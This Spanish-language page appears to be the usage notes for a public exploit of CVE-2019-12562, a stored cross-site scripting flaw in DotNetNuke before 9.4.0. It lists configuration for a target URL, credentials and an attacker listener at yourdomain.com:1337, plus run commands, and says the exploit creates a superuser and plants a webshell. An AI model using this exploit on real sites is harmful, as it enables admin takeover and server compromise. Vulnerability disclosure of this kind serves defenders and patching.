
Cross-Site Scripting Almacenado en DotNetNuke (DNN) Versión anterior a 9.4.0 | XSS a RCE
CVE-2019-12562 Cross-Site Scripting almacenado en DotNetNuke (DNN) versiones anteriores a 9.4.0 permite a atacantes remotos almacenar e incrustar el script malicioso en la página de notificaciones de administración. El exploit podría usarse para realizar cualquier acción con privilegios de administrador, como gestionar contenido, agregar usuarios, subir backdoors al servidor, etc. La explotación exitosa ocurre cuando un usuario administrador visita una página de notificaciones con cross-site scripting almacenado.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
Este exploit creará un superusuario y subirá una webshell al servidor objetivo
Condición del exploit: la explotación exitosa ocurre cuando un usuario administrador visita una página de notificaciones.
Leer más: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Referencia CVE: https://www.cvedetails.com/cve/CVE-2019-12562/